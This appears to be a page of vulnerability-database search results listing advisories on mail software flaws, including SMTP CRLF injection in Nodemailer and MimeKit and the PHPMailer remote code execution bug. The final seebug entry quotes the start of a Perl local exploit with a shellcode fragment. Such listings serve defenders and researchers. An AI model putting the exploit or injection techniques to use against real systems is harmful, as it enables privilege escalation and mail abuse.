32 matches found

AlmaLinux
added 2026/04/16 12:0 a.m. · 4 views

Important: .NET 10.0 security update

.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 10.0.106 and .NET Runtime...

CVSS 7.5 · AI score 5.8 · EPSS 0.08014
Exploits 0 · References 10

Github Security Blog
added 2026/03/26 10:26 p.m. · 32 views

Nodemailer has SMTP command injection due to unsanitized `envelope.size` parameter

Summary: When a custom envelope object is passed to sendMail with a size property containing CRLF characters (\r\n), the value is concatenated directly into the SMTP MAIL FROM command without sanitization. This allows injection of arbitrary SMTP commands, including RCPT TO — silently adding...

AI score 6.1
Exploits 0 · References 3 · Affected Software 1

Tenable Nessus
added 2026/03/11 12:0 a.m. · 7 views

AlmaLinux 9 : python3.12 (ALSA-2026:4165)

The remote AlmaLinux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the ALSA-2026:4165 advisory. cpython: IMAP command injection in user-controlled commands CVE-2025-15366 cpython: POP3 command injection in user-controlled commands CVE-2025-15367...

CVSS 6 · AI score 7.2 · EPSS 0.00104
Exploits 0 · References 5

OSV
added 2026/03/10 12:0 a.m. · 1 view

ALSA-2026:4165 Moderate: python3.12 security update

Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Security Fixes:...

CVSS 6 · AI score 5.8 · EPSS 0.00104
Exploits 0 · References 8

Github Security Blog
added 2026/03/05 9:50 p.m. · 12 views

MimeKit has CRLF Injection in Quoted Local-Part that Enables SMTP Command Injection and Email Forgery

Summary A CRLF Injection vulnerability in MimeKit 4.15.0 allows an attacker to embed \r\n into the SMTP envelope address local-part when the local-part is a quoted-string. This is non-compliant with RFC 5321 and can result in SMTP command injection e.g., injecting additional RCPT TO / DATA / RSET...

CVSS 6.9 · AI score 6 · EPSS 0.01341
Exploits 1 · References 3 · Affected Software 1

EUVD
added 2025/10/07 12:30 a.m. · 1 view

EUVD-1999-0995

Malware in sbrugna...

CVSS 4.6 · AI score 6.4 · EPSS 0.00343
Exploits 1 · References 5

Snyk
added 2025/07/21 6:32 p.m. · 1 view

Improper Neutralization

Overview Affected versions of this package are vulnerable to Improper Neutralization via the handling of SMTP message input. An attacker can inject arbitrary SMTP commands by supplying specially crafted input containing carriage return and line feed characters. Remediation Upgrade...

CVSS 7.5 · AI score 7.1 · EPSS 0.00054
Exploits 0 · References 2

SUSE CVE
added 2023/02/15 6:21 a.m. · 1 view

SUSE CVE-2003-0991

Unknown vulnerability in the mail command handler in Mailman before 2.0.14 allows remote attackers to cause a denial of service crash via malformed e-mail commands...

CVSS 5 · AI score 7 · EPSS 0.01583
Exploits 0 · References 8

Positive Technologies
added 2022/07/05 12:0 a.m. · 2 views

PT-2022-20459 · Nextcloud +1 · Nextcloud Server +1

Name of the Vulnerable Software and Affected Versions: Nextcloud server versions prior to 22.2.8 Nextcloud server versions prior to 23.0.5 Nextcloud server versions prior to 24.0.1 Description: The Nextcloud server is an open source personal cloud server. Affected versions were found to be...

CVSS 7.5 · AI score 5.8 · EPSS 0.02273
Exploits 3 · References 26

Veracode
added 2017/07/26 1:24 a.m. · 44 views

Remote Code Execution (RCE)

PHPMailer is vulnerable to remote code execution (RCE) attacks. A malicious user can inject and execute arbitrary code by passing extra parameters to the mail command. This is due to the improper interaction with the library's escapeshellarg function and internal escaping function performed in PHP...

CVSS 9.8 · AI score 9.7 · EPSS 0.94418
Exploits 59 · References 17 · Affected Software 1

UbuntuCve
added 2016/12/30 7:59 p.m. · 25 views

CVE-2016-10034

The setFrom function in the Sendmail adapter in the zend-mail component before 2.4.11, 2.5.x, 2.6.x, and 2.7.x before 2.7.2, and Zend Framework before 2.4.11 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double...

CVSS 9.8 · AI score 7.7 · EPSS 0.82322
Exploits 10 · References 3

OSV
added 2016/12/30 7:59 p.m. · 39 views

CVE-2016-10033

The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property...

CVSS 9.8 · AI score 9.9 · EPSS 0.94418
Exploits 59 · References 22

OSV
added 2016/12/30 7:59 p.m. · 6 views

DEBIAN-CVE-2016-10033

The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property...

CVSS 9.8 · AI score 8 · EPSS 0.94418
Exploits 58 · References 1

Cvelist
added 2016/12/30 7:0 p.m. · 37 views

CVE-2016-10033

The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property...

AI score 9.9 · EPSS 0.94418
Exploits 58 · References 21

ATTACKERKB
added 2016/12/30 12:0 a.m. · 226 views

CVE-2016-10033

The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property. Recent assessments: Assessed Attacker Value: 0...

CVSS 9.8 · AI score 9.9 · EPSS 0.94418
In wild · Exploits 59 · References 31

n0where
added 2015/04/11 5:54 p.m. · 17 views

Send-Only Postfix Server

Postfix is an MTA (Mail Transfer Agent), an application used to send and receive email. In this tutorial, we will install and configure Postfix so that it can be used to send emails by local applications only. Why would you want to do that? If you’re already using a third-party email provider for...

AI score 7
Exploits 0

Fedora
added 2015/01/03 7:9 p.m. · 27 views

[SECURITY] Fedora 21 Update: mailx-12.5-14.fc21

Mailx is an enhanced mail command, which provides the functionality of the POSIX mailx command, as well as SysV mail and Berkeley Mail from which it is derived. Additionally to the POSIX features, mailx can work with Maildir/ e-mail storage format as well as mailboxes, supports IMAP, POP3 and SMT...

CVSS 7.8 · AI score 0.4 · EPSS 0.02879
Exploits 1

Fedora
added 2015/01/03 7:3 p.m. · 29 views

[SECURITY] Fedora 19 Update: mailx-12.5-9.fc19

Mailx is an enhanced mail command, which provides the functionality of the POSIX mailx command, as well as SysV mail and Berkeley Mail from which it is derived. Additionally to the POSIX features, mailx can work with Maildir/ e-mail storage format as well as mailboxes, supports IMAP, POP3 and SMT...

CVSS 7.8 · AI score 0.4 · EPSS 0.02879
Exploits 1

Debian
added 2014/12/16 5:56 p.m. · 27 views

[SECURITY] [DSA 3104-1] bsd-mailx security update

Debian Security Advisory DSA-3104-1 · http://www.debian.org/security/ · Florian Weimer · December 16, 2014 · http://www.debian.org/security/faq ...

CVSS 7.8 · AI score 7.7 · EPSS 0.02879
Exploits 1

seebug.org
added 2006/10/28 12:0 a.m. · 12 views

Mandrake Linux 8.2 /usr/mail local exploit (d86mail.pl)

No description provided by source. !/usr/bin/perl Mandrake 8.2 /usr/mail local exploit Usage: perl d86mail.pl offset Then enter "." dot and press 'Enter' Example: satan@localhost my$ perl d86mail.pl eip: 0xbffffddd .enter Cc: too long to edit sh-2.05$ $shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x8...

AI score 7.1
Exploits 0